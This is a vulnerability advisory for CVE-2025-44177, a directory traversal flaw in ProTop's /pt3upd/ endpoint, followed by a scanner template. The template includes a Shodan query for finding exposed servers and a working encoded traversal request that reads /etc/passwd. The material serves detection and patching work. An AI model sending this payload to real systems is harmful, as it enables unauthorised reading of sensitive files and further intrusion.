White Star Software ProTop Directory Traversal Vulnerability
漏洞信息
漏洞名称: White Star Software ProTop Directory Traversal Vulnerability
漏洞编号:
CVE: CVE-2025-44177
漏洞类型: 目录遍历
漏洞等级: 高危
漏洞描述: White Star Software ProTop是一款广泛使用的软件,主要用于企业级服务中,提供高效的数据处理和通信功能。其典型部署场景包括企业内部网络和数据中心,因其稳定性和高效性而受到许多企业的青睐。此次发现的目录遍历漏洞存在于ProTop的/pt3upd/端点,影响版本为4.4.2-2024-11-27。漏洞的技术根源在于未能正确处理用户提供的输入,特别是对编码的遍历序列缺乏充分的验证,导致攻击者可以绕过安全限制,访问系统上的任意文件。这种漏洞的存在使得未经身份验证的攻击者能够远程读取底层操作系统上的敏感文件,如/etc/passwd,从而可能导致信息泄露,进一步被利用进行更严重的攻击。由于攻击者无需认证即可利用此漏洞,且攻击可以自动化执行,因此该漏洞的安全风险较高,可能对受影响系统造成严重威胁。
info: name:White Star Software ProTop - Directory Traversal author:s-cu-bot severity:high description:| A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences. remediation:| Upgrade White Star Software ProTop to a version after v4.4.2-2024-11-27. reference: -https://nvd.nist.gov/vuln/detail/CVE-2025-44177 -https://client.protop.co.za/ -https://wss.com/ -https://gist.github.com/stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d classification: cvss-metrics:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N cvss-score:8.2 cve-id:CVE-2025-44177 cwe-id:CWE-22 cpe:cpe:2.3:a:wss:protop:4.4.2-2024-11-27:*:*:*:*:*:*:* metadata: verified:true max-request:1 vendor:white-star-software product:protop shodan-query:html:"<title>ProTop" tags:cve2025,lfi,traversal,protop
http: -raw: -| GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host:{{Hostname}}